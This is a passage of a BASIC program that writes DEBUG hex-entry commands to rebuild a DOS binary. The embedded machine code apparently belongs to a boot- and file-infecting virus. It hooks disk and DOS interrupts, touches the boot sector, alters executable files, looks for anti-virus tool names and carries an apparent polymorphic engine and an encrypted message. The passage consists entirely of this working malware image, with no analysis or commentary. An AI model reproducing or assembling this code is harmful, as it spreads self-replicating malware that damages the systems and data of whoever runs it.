Print #1, "E 04A0 1E F3 A4 B0 02 B9 E0 01 F3 AA B1 01 E8 4B 0A B8"
Print #1, "E 04B0 01 02 B6 01 E8 46 0A E8 69 0A E8 3D 0A 61 C3 60"
Print #1, "E 04C0 1E 8B EC C5 76 12 E8 9B 09 3D CC CF 74 26 3D 63"
Print #1, "E 04D0 80 75 1A 81 7C 04 72 11 75 13 81 7C 0E E4 CF 74"
Print #1, "E 04E0 13 3D 2E FF 75 07 81 7C 09 FA 9A 74 07 8C D8 3D"
Print #1, "E 04F0 00 F0 75 11 8C D8 2E A3 91 14 8B 46 12 2E A3 8F"
Print #1, "E 0500 14 80 66 17 FE 1F 61 CF FA 33 C0 8E D0 BC 00 7C"
Print #1, "E 0510 FB 8E C4 06 68 16 02 93 B8 09 02 B9 08 00 BA 80"
Print #1, "E 0520 00 CD 13 72 FE CB FC E8 5F 00 06 0E 07 B8 F0 04"
Print #1, "E 0530 BE 84 00 BF 8F 14 87 44 C8 AB 33 C0 87 44 CA AB"
Print #1, "E 0540 A5 A5 07 B8 01 02 8B DC 49 CD 13 0A D2 74 03 E8"
Print #1, "E 0550 D1 09 06 53 B1 FF 43 81 3F C2 73 75 04 C6 47 01"
Print #1, "E 0560 EB 81 3F A7 75 75 03 88 67 02 E2 EA E8 B5 FE 40"
Print #1, "E 0570 A3 44 0C B4 04 CD 1A 80 F9 90 77 07 72 0A 80 FE"
Print #1, "E 0580 04 72 05 C6 06 41 0C 90 CB 2E C6 06 41 0C C3 33"
Print #1, "E 0590 C0 8E D8 8E C0 2E A2 99 05 2E A3 B4 04 BF F0 04"
Print #1, "E 05A0 B0 EA AA 88 45 EF B8 A6 02 AB C7 45 EE B3 04 8C"
Print #1, "E 05B0 C8 AB 89 45 EE C3 60 1E 06 6A 00 1F 80 3E 87 00"
Print #1, "E 05C0 08 77 0D C7 06 F1 04 C3 02 C5 3E 84 00 E8 4B 01"
Print #1, "E 05D0 07 1F 61 E8 7B 09 2E FF 06 A1 0E 81 FC 00 13 72"
Print #1, "E 05E0 0B 81 FC 00 16 77 05 80 FC F2 74 69 80 FC 02 74"
Print #1, "E 05F0 05 80 FC 03 75 41 83 FA 02 72 5D 80 FA 80 75 37"
Print #1, "E 0600 83 F9 01 75 37 80 FE 01 77 2D 51 FE C8 74 0C 50"
Print #1, "E 0610 53 80 C7 02 41 E8 E5 08 49 5B 58 B0 01 80 FA 01"
Print #1, "E 0620 77 08 B9 01 50 E8 D5 08 EB 09 0A F6 75 02 B1 07"
Print #1, "E 0630 E8 EA 08 59 CA 02 00 2E FF 2E 8F 14 0A F6 75 F7"
Print #1, "E 0640 50 8C C8 80 FC 7C 58 74 EE 83 F9 11 77 E9 80 F9"
Print #1, "E 0650 06 72 E4 B4 00 F8 EB DC 83 F9 01 75 DA 50 E8 9C"
Print #1, "E 0660 08 73 05 44 44 F9 EB EE 58 26 80 BF FD 01 F2 74"
Print #1, "E 0670 99 60 1E 06 06 1F 0E 07 8B F3 BF 8F 12 B9 00 01"
Print #1, "E 0680 2E 38 0E 99 05 75 18 F3 A5 80 3F EB 75 11 8B 47"
Print #1, "E 0690 13 BF F4 11 3D 40 0B 74 08 BF E9 11 3D 60 09 75"
Print #1, "E 06A0 74 0E 1F B8 1E 35 CD 21 53 06 B4 25 50 52 8B D7"
Print #1, "E 06B0 CD 21 5A 0E 07 BD 50 00 B1 0A BF 67 12 8B DF 8B"
Print #1, "E 06C0 C5 AB 8A C1 F6 D8 04 0B B4 02 AB E2 F2 B8 0A 05"
Print #1, "E 06D0 B9 01 50 E8 27 08 72 38 BB 8F 12 E8 1C 08 72 30"
Print #1, "E 06E0 41 B8 09 03 33 DB E8 14 08 72 25 89 0E 0C 02 89"
Print #1, "E 06F0 1E 0F 02 93 BB 8F 12 8A 47 01 97 8D 79 02 BE F8"
Print #1, "E 0700 01 B9 1E 00 F3 A4 C6 87 FD 01 F2 B1 01 E8 EA 07"
Print #1, "E 0710 58 1F 5A CD 21 07 1F 61 E9 38 FF B4 30 CD 21 3C"
Print #1, "E 0720 05 72 09 B4 52 CD 21 06 1F BF 9E 10 B9 01 00 2E"
Print #1, "E 0730 89 3E 93 14 2E 8C 1E 95 14 8B 05 3C 90 74 05 3D"
Print #1, "E 0740 03 EB 75 07 8B 7D 08 C4 3D EB 12 3D 2E 3A 75 05"
Print #1, "E 0750 41 1E 07 EB 08 3C EA 75 13 C4 7D 01 49 B0 9A FC"
Print #1, "E 0760 AA B8 E0 04 AB 33 C0 AB B0 90 F3 AA C3 B8 00 43"
Print #1, "E 0770 CD 2F 3C 80 75 1E B8 10 43 CD 2F 2E 89 1E 97 14"
Print #1, "E 0780 2E 8C 06 99 14 B4 10 8B D7 2E FF 1E 97 14 48 75"
Print #1, "E 0790 03 8B EB C3 B8 00 58 CD 21 50 B8 01 58 50 BB 80"
Print #1, "E 07A0 00 CD 21 B8 02 58 CD 21 B4 00 50 B8 03 58 50 B3"
Print #1, "E 07B0 01 CD 21 B4 48 8B DF CD 21 95 58 5B CD 21 58 5B"
Print #1, "E 07C0 CD 21 C3 E9 D6 00 2E C6 06 B4 04 D5 60 E8 74 06"
Print #1, "E 07D0 8B DA B9 80 00 80 FF FF 74 32 80 7F 01 3A 75 2C"
Print #1, "E 07E0 80 3F 2E 75 24 81 7F FE 4F 50 74 0E 81 7F FE 54"
Print #1, "E 07F0 41 74 07 81 7F FB 51 43 75 0F FE 07 B8 20 09 33"
Print #1, "E 0800 DB B1 F0 CD 10 93 E9 8D 00 43 E2 D4 1E 06 B4 52"
Print #1, "E 0810 CD 21 26 8E 5F FE BE 10 00 80 7C F4 80 B0 00 77"
Print #1, "E 0820 73 BF 4E 01 E8 46 FF 8B D5 80 FE A0 72 0C 4D 8E"
Print #1, "E 0830 DD 8B C7 C7 44 F1 08 00 EB 35 1E 80 3C 46 74 05"
Print #1, "E 0840 80 3C 44 75 21 80 3C 4D 74 12 80 3C 54 74 0D 8B"
Print #1, "E 0850 44 01 48 8E C0 03 44 03 8E D8 EB E9 8D 03 26 2B"
Print #1, "E 0860 44 F1 26 89 44 F3 1F 8C D8 2B E8 95 05 4D 01 2E"
Print #1, "E 0870 8C 1E 8E 05 0E 1F A3 95 05 8E C2 B0 D6 A2 B4 04"
Print #1, "E 0880 B9 DC 14 33 F6 33 FF FC F3 A4 8E D9 8C 06 E3 04"
Print #1, "E 0890 8C 06 F3 04 07 1F 2E A2 B4 04 61 CB 1E 68 01 C8"
Print #1, "E 08A0 1F C7 06 03 00 4E 01 1F EB 68 2E 8C 1E F7 05 0E"
Print #1, "E 08B0 1F 89 1E E2 05 BB E2 05 89 47 06 89 4F 0C 89 57"
Print #1, "E 08C0 12 89 77 09 89 7F 0F 89 6F 03 8C 47 19 C6 47 B7"
Print #1, "E 08D0 68 FF 06 A3 0E FC E8 78 06 8A C4 1E B9 0E 00 07"
Print #1, "E 08E0 BF 1A 06 F2 AE 75 28 D1 E1 03 D9 68 FF 05 FF 77"
Print #1, "E 08F0 46 BB 00 00 BD 00 00 B8 00 00 BE 00 00 B9 00 00"
Print #1, "E 0900 BF 00 00 BA 00 00 68 00 00 1F 68 00 00 07 C3 E8"
Print #1, "E 0910 0E 00 80 FC 6C 77 01 CB 83 C4 04 32 C0 CA 02 00"
Print #1, "E 0920 E8 CE FF 2E C6 06 99 05 00 C3 4B 4C 11 12 4E 4F"
Print #1, "E 0930 42 3F 3E 3D 32 44 25 40 C3 0B 39 0B 29 0B 2D 0B"
Print #1, "E 0940 68 06 1B 0B B5 0A 84 0A 67 09 49 09 B9 09 B9 09"
Print #1, "E 0950 1B 0B 4F 06 20 43 4F 20 00 2F 44 3A 46 20 00 3C"
Print #1, "E 0960 00 74 15 3C 01 75 10 B8 02 3D E8 A8 05 72 08 93"
Print #1, "E 0970 E8 60 05 B4 3E CD 21 C3 E8 B0 04 50 8B F2 BF 9B"
Print #1, "E 0980 14 0E 07 AC AA 0A C0 75 FA 0E 1F 59 80 FD 3D 75"
Print #1, "E 0990 2A C3 81 7D F3 53 4D 75 07 81 7D F9 48 4B 74 0E"
Print #1, "E 09A0 81 7D F4 43 48 75 D0 81 7D F6 4B 4C 75 C9 E8 6F"
Print #1, "E 09B0 FF 83 C4 06 B8 02 00 F9 CA 02 00 80 FD 4B 75 11"
Print #1, "E 09C0 C6 06 81 06 C3 81 7D F9 41 56 75 05 C6 06 81 06"
Print #1, "E 09D0 90 BE 49 06 81 7D F8 57 49 75 06 80 7D FA 4E 74"
Print #1, "E 09E0 11 BE 44 06 81 7D F6 42 53 75 39 81 7D F9 41 4E"
Print #1, "E 09F0 75 32 BF 8F 12 8B DF C6 05 FF 47 AC 0A C0 74 05"
Print #1, "E 0A00 AA FE 07 EB F6 8B 36 E2 05 8E 1E FB 05 8C C8 87"
Print #1, "E 0A10 44 04 50 8B C3 87 44 02 96 1F 46 AC AA 2E FF 07"
Print #1, "E 0A20 3C 0D 75 F7 0E 1F C6 06 B9 09 90 B4 2F CD 21 53"
Print #1, "E 0A30 06 B4 1A BA 04 12 CD 21 B8 24 35 CD 21 53 06 B4"
Print #1, "E 0A40 25 50 BA 8D 00 CD 21 B3 00 E8 3B 00 B4 4E B9 27"
Print #1, "E 0A50 00 E8 DF 00 72 24 BE 00 12 33 FF 80 7C 04 02 77"
Print #1, "E 0A60 16 52 B5 04 BA F5 03 B0 04 EE E2 FE B5 04 EE E2"
Print #1, "E 0A70 FE EC A8 40 5A 75 03 E8 1D 00 58 1F 5A CD 21 B4"
Print #1, "E 0A80 1A 1F 5A CD 21 B3 00 60 B8 02 FA BA 45 59 CD 16"
Print #1, "E 0A90 2E 88 0E 76 07 61 C3 39 7C 20 75 07 81 7C 1E 11"
Print #1, "E 0AA0 27 72 F3 B4 2A CD 21 8B 44 1C D1 E8 80 E9 BC 3A"
Print #1, "E 0AB0 E1 75 09 C1 E8 04 24 0F 3A C6 74 DA 8A 44 19 24"
Print #1, "E 0AC0 07 74 08 B8 01 43 33 C9 E8 68 00 B8 02 3D E8 62"
Print #1, "E 0AD0 00 72 53 93 B8 00 57 CD 21 51 52 B4 3F E8 68 01"
Print #1, "E 0AE0 72 38 80 7C 18 40 74 32 8B 04 02 C4 3C A7 75 2A"
Print #1, "E 0AF0 8B 44 04 48 33 D2 BD 00 02 F7 E5 03 44 02 13 D7"
Print #1, "E 0B00 39 44 1E 75 15 39 54 20 75 10 B0 02 E8 43 01 E8"
Print #1, "E 0B10 23 02 74 06 E8 14 03 E8 20 00 B8 01 57 5A 59 E8"
Print #1, "E 0B20 F3 03 B4 3E CD 21 B8 01 43 33 C9 8A 4C 19 80 F9"
Print #1, "E 0B30 20 74 06 BA 9B 14 E9 DC 03 C3 8B 44 0E A3 75 00"
Print #1, "E 0B40 8B 44 10 A3 71 00 8B 44 14 A3 81 00 8B 44 16 A3"
Print #1, "E 0B50 7B 00 8B 44 0C 80 FC FF 74 12 8B 44 04 99 B9 20"
Print #1, "E 0B60 00 F7 E1 2B 44 08 03 44 0C 05 10 00 A3 56 00 B4"
Print #1, "E 0B70 00 CD 1A 52 92 B4 F2 2A E0 F7 D8 89 44 22 58 8A"
Print #1, "E 0B80 CC 25 1F 00 C1 E0 04 A3 FE 08 8B 54 1E 83 E2 0F"
Print #1, "E 0B90 03 C2 A3 AD 0E 80 E1 1F 89 0E 0B 09 8B 44 1E 05"
Print #1, "E 0BA0 24 12 8B D0 0C 1F 2B C2 A3 E6 08 50 68 00 BE 07"
Print #1, "E 0BB0 33 FF 26 81 3D 20 07 74 02 58 C3 E8 0C 04 B4 40"
Print #1, "E 0BC0 B9 00 12 E8 90 00 3B C1 59 C7 05 20 07 0E 1F 75"
Print #1, "E 0BD0 E9 B6 13 E8 3D 03 B9 24 00 BA 00 12 E8 5F 03 E8"
Print #1, "E 0BE0 31 03 E8 59 03 E8 68 00 8B 44 1E 8B 54 20 50 52"
Print #1, "E 0BF0 05 24 12 13 D7 05 17 00 13 D7 F7 F5 40 89 44 04"
Print #1, "E 0C00 89 54 02 5A 58 F7 36 5A 08 2B 44 08 50 B9 60 00"
Print #1, "E 0C10 C1 E9 04 2B C1 89 44 16 58 48 05 04 00 89 44 0E"
Print #1, "E 0C20 03 16 FE 08 89 54 14 B8 00 16 8B 16 0B 09 C1 E2"
Print #1, "E 0C30 04 2B C2 89 44 10 81 44 0A 61 01 8B 44 0A 39 44"
Print #1, "E 0C40 0C 77 03 89 44 0C B4 40 B9 19 00 8B D6 E9 C5 02"
Print #1, "E 0C50 B0 00 B4 42 33 C9 99 EB F4 FC 0E 07 8B F2 BF 9B"
Print #1, "E 0C60 14 8B CF AC AA 3C 5C 75 02 8B CF 0A C0 75 F4 2E"
Print #1, "E 0C70 89 0E 79 09 E8 7A FC 83 C4 06 CD 21 72 43 50 E8"
Print #1, "E 0C80 83 00 72 3B 1E 8D 77 1E BF 9B 14 BA 9B 14 B9 0D"
Print #1, "E 0C90 00 0E 07 F3 A4 07 0E 1F 8B F3 B8 00 3D E8 75 02"
Print #1, "E 0CA0 72 1D 93 E8 85 01 E8 8C 00 9C B4 3E CD 21 9D 75"
Print #1, "E 0CB0 0E A1 61 12 26 89 44 1A A1 63 12 26 89 44 1C 58"
Print #1, "E 0CC0 F8 50 E8 5B FC 58 CA 02 00 90 83 C4 06 CD 21 3C"
Print #1, "E 0CD0 00 75 EE 50 E8 2E 00 72 E6 0E 07 8D 77 FE BF 43"
Print #1, "E 0CE0 12 8B D7 FC B9 08 00 E8 12 00 B0 2E AA 8D 77 06"
Print #1, "E 0CF0 B1 03 E8 07 00 B0 00 AA 1E 07 EB 9E AC 3C 20 74"
Print #1, "E 0D00 03 AA E2 F8 C3 B4 2F CD 21 06 1F 80 3F FF 75 03"
Print #1, "E 0D10 83 C3 07 2E 80 3E E9 05 12 77 03 83 C3 03 8A 47"
Print #1, "E 0D20 1A 24 1F 3C 1F 74 02 F9 C3 83 7F 1C 00 75 05 81"
Print #1, "E 0D30 7F 1A 11 27 C3 B8 00 44 CD 21 A8 80 75 55 0E 1F"
Print #1, "E 0D40 B0 01 E8 0D FF 72 4C A3 63 0A 89 16 66 0A 80 FB"
Print #1, "E 0D50 00 74 27 B8 02 42 B9 FF FF BA DC FF CD 21 88 1E"
Print #1, "E 0D60 40 0A B4 3F B9 24 00 BA 43 12 CD 21 E8 CF 01 B8"
Print #1, "E 0D70 00 42 BA 00 00 B9 00 00 CD 21 80 3E 43 12 5A 74"
Print #1, "E 0D80 07 80 3E 43 12 4D 75 0B 50 A1 65 12 F7 D8 02 C4"
Print #1, "E 0D90 3C F2 58 C3 3C 02 75 FB E8 9A FF 75 F6 83 C4 06"
Print #1, "E 0DA0 E8 4E FB 51 B0 00 2E 8B 0E 63 12 2E 8B 16 61 12"
Print #1, "E 0DB0 2E 03 16 F4 05 83 D1 00 2E 03 0E EE 05 CD 21 E8"
Print #1, "E 0DC0 61 FB 59 EB 63 51 E8 6C FF 5D 75 C7 83 C4 06 BE"
Print #1, "E 0DD0 43 12 2B 44 1E 83 DA 00 2B 54 20 78 08 E8 40 FB"
Print #1, "E 0DE0 2B C0 F8 EB 43 03 C5 83 D2 00 75 02 2B E8 55 E8"
Print #1, "E 0DF0 FF FA 59 CD 21 9C 50 72 2A 1E 07 8B FA 0E 1F BE"
Print #1, "E 0E00 43 12 83 3E 66 0A 00 75 1A A1 63 0A 3D 18 00 73"
Print #1, "E 0E10 12 03 F0 03 C8 83 F9 18 76 06 2D 18 00 F7 D8 91"
Print #1, "E 0E20 FC F3 A4 E8 FA FA 58 9D CA 02 00 2E C6 06 40 0A"
Print #1, "E 0E30 00 2E C7 06 65 12 00 00 C3 3C 52 75 06 2E C6 06"
Print #1, "E 0E40 B9 09 C3 C3 80 FC 25 75 78 8B F2 81 3C CD 30 75"
Print #1, "E 0E50 13 2E C5 16 8F 14 1E 07 8B C2 B7 13 93 CD 2F A1"
Print #1, "E 0E60 FF FF EB FE 8B 04 3C EB 75 11 81 7C 07 FA 9C 75"
Print #1, "E 0E70 0A 81 7C 09 FC 53 75 03 C6 04 A8 3D FA 9C 75 0B"
Print #1, "E 0E80 81 7C 04 F6 06 75 04 C6 44 09 EB 3D 2E 83 75 13"
Print #1, "E 0E90 81 7C 09 50 55 75 0C 80 BC 6E 01 E8 75 05 C6 84"
Print #1, "E 0EA0 6E 01 C3 3D CD 30 75 02 EB FE 3D FB 2E 75 13 81"
Print #1, "E 0EB0 7C 07 75 03 75 0B 81 7C 0D FC FA 75 04 C6 44 08"
Print #1, "E 0EC0 00 C3 3D 9C EB 75 FA 81 7C 02 00 80 75 F3 C6 44"
Print #1, "E 0ED0 07 00 C3 E8 5F FE 75 E9 E8 75 FD BE 43 12 E8 65"
Print #1, "E 0EE0 FD 72 14 B8 00 42 8B 0E 63 12 8B 16 61 12 CD 21"
Print #1, "E 0EF0 B4 40 33 C9 E8 1E 00 E9 75 FE B8 01 03 53 33 DB"
Print #1, "E 0F00 E8 84 FB 5B FA 9C 2E FF 1E 8F 14 53 9C E8 75 FB"
Print #1, "E 0F10 9D 5B C3 B4 40 FA 9C 2E FF 1E 93 14 C3 E8 03 00"
Print #1, "E 0F20 E8 DA FF 60 8B F3 8B FB 8A CE BA AD DE D3 E2 B9"
Print #1, "E 0F30 FF 00 26 AD 33 C2 83 C2 7F AB E2 F6 61 C3 60 8B"
Print #1, "E 0F40 F2 8A 5C 23 49 AC 32 C3 02 D9 88 44 FF E2 F6 61"
Print #1, "E 0F50 C3 C3 60 B9 01 00 E2 FE 2E FE 06 44 0C 75 1E B8"
Print #1, "E 0F60 03 00 CD 10 B4 02 B7 00 BA 03 0C CD 10 BE 6F 0C"
Print #1, "E 0F70 2E AC 34 F5 CD 29 0A C0 75 F6 98 CD 16 61 C3 C9"
Print #1, "E 0F80 BD B4 A3 BA B6 CB D5 97 8C D5 BB 90 80 87 9A 97"
Print #1, "E 0F90 94 86 9D 90 87 D2 CC C6 DA B2 90 87 98 94 9B 8C"
Print #1, "E 0FA0 D5 31 B2 A7 BC A5 A5 B0 B1 31 B7 AC 31 B3 B0 B4"
Print #1, "E 0FB0 A7 31 A0 BB A1 BC B9 31 B1 B0 B4 A1 BD 31 A0 A6"
Print #1, "E 0FC0 31 B1 BA 31 A5 B4 A7 A1 31 F5 60 33 F6 B9 DC 14"
Print #1, "E 0FD0 F3 A4 BE 9A 0E 2B FF 33 C0 A3 2E 0E C6 06 37 0E"
Print #1, "E 0FE0 35 A3 38 0E C7 44 99 90 90 C6 44 98 05 B4 2C CD"
Print #1, "E 0FF0 21 89 4C 03 89 54 05 B4 2A CD 21 89 0C 88 44 02"
Print #1, "E 1000 52 B4 00 CD 1A 87 E9 59 87 F3 FC 8B C1 03 C2 33"
Print #1, "E 1010 C5 89 47 59 8B C2 0B C5 D1 C0 F7 D8 89 47 6F 89"
Print #1, "E 1020 47 94 68 9B 11 68 63 11 B8 42 11 FF D0 58 FF D0"
Print #1, "E 1030 58 FF D0 A1 13 0D 87 06 16 0D 87 06 19 0D F6 C1"
Print #1, "E 1040 01 74 04 87 06 16 0D A3 13 0D B0 0F E8 81 03 89"
Print #1, "E 1050 7F 0B 8B F1 83 E6 07 D1 E6 83 FE 06 72 11 83 FE"
Print #1, "E 1060 08 77 0C B0 F8 F6 C5 02 74 01 40 AA 88 47 96 F6"
Print #1, "E 1070 47 09 03 75 03 B0 2E AA F6 47 03 03 75 0B 83 C6"
Print #1, "E 1080 10 83 FE 18 77 03 B0 81 AA FF 50 A8 B8 AF 11 BE"
Print #1, "E 1090 C0 11 F6 C2 01 75 01 96 56 FF D0 58 FF D0 B0 0F"
Print #1, "E 10A0 E8 2D 03 8B 77 07 83 E6 03 D1 E6 FF 50 D8 E8 1D"
Print #1, "E 10B0 03 8A 47 05 25 03 00 96 81 C6 8A 0E A4 89 7F 0D"
Print #1, "E 10C0 AA E8 0A 03 83 FD 13 72 0F F6 47 03 03 75 09 B8"
Print #1, "E 10D0 33 C9 AB B0 E3 AA EB 0B 8B 77 06 83 E6 03 81 C6"
Print #1, "E 10E0 8E 0E A4 8B 47 0B 2B C7 48 26 80 7D FF E9 74 03"
Print #1, "E 10F0 AA EB 02 48 AB 57 B0 68 AA 8B 47 13 05 40 00 AB"
Print #1, "E 1100 B0 C3 AA 5F 8B 47 0D 8B F0 F7 D8 03 C7 48 26 88"
Print #1, "E 1110 04 B8 42 12 8B 77 11 2B C7 03 47 13 26 89 04 8B"
Print #1, "E 1120 77 0F 8B C7 03 47 13 B9 05 00 06 1F 80 3C FE 75"
Print #1, "E 1130 02 88 04 80 3C FF 75 02 88 24 46 E2 EF B8 82 76"
Print #1, "E 1140 F8 29 05 90 90 47 47 35 00 00 81 FF 01 12 72 F0"
Print #1, "E 1150 61 C3 69 0F 7C 0F 86 0F 8A 0F 94 0F 98 0F A3 0F"
Print #1, "E 1160 AE 0F FF 0E 2A 0F 39 0F 3D 0F 46 0F 98 0F A3 0F"
Print #1, "E 1170 AE 0F E1 0E E1 0E FA 0E 0D 0F CB 0F EC 0F F5 0F"
Print #1, "E 1180 13 10 28 10 35 10 47 10 56 10 6E 10 79 10 80 10"
Print #1, "E 1190 8E 10 8B C6 89 F0 8D 04 56 58 74 77 73 74 EB 75"
Print #1, "E 11A0 E9 72 62 11 50 11 59 11 59 11 00 00 00 00 00 00"
Print #1, "E 11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06"
Print #1, "E 11C0 07 03 03 04 05 07 07 01 02 05 08 10 28 74 7D 5F"
Print #1, "E 11D0 5F EC 10 E9 10 34 11 ED 10 13 11 F5 10 F9 10 0B"
Print #1, "E 11E0 11 17 11 23 11 F1 10 FE 10 3A 11 3E 11 2B 11 02"
Print #1, "E 11F0 11 B8 C0 05 F6 C6 01 74 03 B8 E8 2D E8 5B 00 88"
Print #1, "E 1200 67 9D B8 CC 45 AB 89 47 9E C3 B8 F0 35 EB ED B0"
Print #1, "E 1210 30 E8 5B 00 C6 47 97 31 B8 82 76 AB C3 4F B0 D1"
Print #1, "E 1220 AA 88 47 9D B8 C0 C0 F6 C6 01 74 03 B8 C8 C8 E8"
Print #1, "E 1230 28 00 B0 90 86 C4 89 47 9E C3 B0 00 E8 30 00 34"
Print #1, "E 1240 28 24 F8 40 88 47 97 EB CF B0 28 EB EF B0 10 E8"
Print #1, "E 1250 1D 00 34 08 EB EB B0 18 EB F5 8B 77 03 83 E6 03"
Print #1, "E 1260 02 40 1C AA C3 8B F2 83 E6 03 02 40 15 AA C3 8B"
Print #1, "E 1270 F2 83 E6 03 02 40 19 AA C3 B0 31 AA 88 47 97 B0"
Print #1, "E 1280 00 8B 77 03 83 E6 03 02 40 1F EB E3 B0 01 AA 34"
Print #1, "E 1290 28 88 47 97 EB E9 B0 29 EB F4 B0 11 AA 34 08 88"
Print #1, "E 12A0 47 97 EB DB B0 19 EB F4 B8 F7 15 AA 89 47 97 B0"
Print #1, "E 12B0 10 EB BC B8 F7 1D AA 89 47 97 B0 18 EB B1 B0 D1"
Print #1, "E 12C0 AA 88 47 97 B0 00 F7 C5 01 00 74 02 34 08 E8 9E"
Print #1, "E 12D0 FF 24 08 0C 05 34 08 88 47 98 C3 F6 C1 05 74 0E"
Print #1, "E 12E0 B0 40 E8 80 FF 50 B0 0F E8 E5 00 58 AA C3 B0 FF"
Print #1, "E 12F0 AA B0 C0 E8 6F FF 26 8B 45 FE AB C3 B4 C0 E8 13"
Print #1, "E 1300 00 B0 02 EB 07 B4 E8 E8 0A 00 B0 FE F6 C6 03 74"
Print #1, "E 1310 44 98 AB C3 B0 83 F6 C6 03 74 02 34 02 AA 8A C4"
Print #1, "E 1320 E9 42 FF B0 8D AA 8B F2 83 E6 03 8A 40 23 F6 C6"
Print #1, "E 1330 03 74 02 04 40 AA EB C9 B0 81 AA B0 F8 E8 25 FF"
Print #1, "E 1340 89 7F 11 AB C3 B0 B8 AA E8 F5 FF B0 2B AA B0 C0"
Print #1, "E 1350 E8 12 FF B0 F5 AA C3 B0 B8 AA E8 E3 FF B8 F7 D8"
Print #1, "E 1360 AB B0 03 AA EB E8 8B C2 24 03 75 CC 8B 77 09 83"
Print #1, "E 1370 E6 03 D1 E6 81 C6 82 0E A5 B0 3D AA EB C2 B0 B8"
Print #1, "E 1380 02 46 02 AA 8B 46 04 AB C3 B0 C7 AA B0 C0 EB F0"
Print #1, "E 1390 B0 8D AA 8A 46 02 98 C1 E0 03 04 06 EB E5 80 7E"
Print #1, "E 13A0 02 04 77 1C B0 B0 8A 66 04 02 46 02 96 B0 B4 8A"
Print #1, "E 13B0 66 05 02 46 02 F7 C7 01 00 75 01 96 AB 96 AB C3"
Print #1, "E 13C0 B0 68 AA 8B 46 04 AB B0 58 02 46 02 AA C3 B0 09"
Print #1, "E 13D0 98 96 E8 0D 00 25 0F 00 3B C6 77 F6 D1 E0 96 FF"
Print #1, "E 13E0 60 27 53 1E 0E 1F BB 97 04 8B 07 1F 43 03 DF 80"
Print #1, "E 13F0 E7 1F 2E 89 1E D7 10 5B C3 B0 FC AA C3 B0 FD AA"
Print #1, "E 1400 C3 B0 90 AA C3 B0 FA AA C3 B0 FB AA C3 C3 B0 98"
Print #1, "E 1410 AA C3 B8 F8 73 AB B8 01 EA AB C3 B0 B0 AA E8 C1"
Print #1, "E 1420 FF AA C3 B0 B4 EB F6 B0 8B AA E8 B5 FF 24 07 04"
Print #1, "E 1430 C0 AA C3 B0 B8 AA E8 A9 FF AB C3 B8 B4 4D AB B8"
Print #1, "E 1440 CD 21 AB C3 B8 8D 06 AB EB EC B0 25 EB E7 B0 0D"
Print #1, "E 1450 EB E3 E8 79 FF 8B 77 09 83 E6 03 D1 E6 FF 60 F8"
Print #1, "E 1460 B8 8C C8 AB B8 8E D8 AB C3 B0 0E AA E8 5F FF B0"
Print #1, "E 1470 1F AA C3 8A C1 24 07 3C 04 77 54 F6 47 03 03 74"
Print #1, "E 1480 4E E8 4A FF 8B 47 6F 89 47 94 50 8B 77 03 83 E6"
Print #1, "E 1490 03 8A 40 1C 8B 77 03 98 50 C1 EE 03 83 E6 03 55"
Print #1, "E 14A0 8B EC D1 E6 FF 50 E0 5D 58 58 C3 E8 20 FF 89 7F"
Print #1, "E 14B0 0F 6A FE 8B F2 83 E6 03 8A 40 15 8B F2 EB D8 B0"
Print #1, "E 14C0 0F E8 0C FF 8B 77 04 83 E6 03 D1 E6 FF 50 D0 C3"
Print #1, "E 14D0 8A C1 24 07 3C 04 77 F7 8A C5 25 03 00 D1 E0 96"
Print #1, "E 14E0 74 ED F6 47 03 03 74 E7 56 B0 0F E8 E2 FE 5E B0"
Print #1, "E 14F0 81 AA FF 60 C8 E9 11 F4 11 DF 02 25 02 0F 1B FF"
Print #1, "E 1500 54 F6 0F 08 DF 02 25 02 12 1B FF 6C F6 0F 08 00"
Print #1, "E 1510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
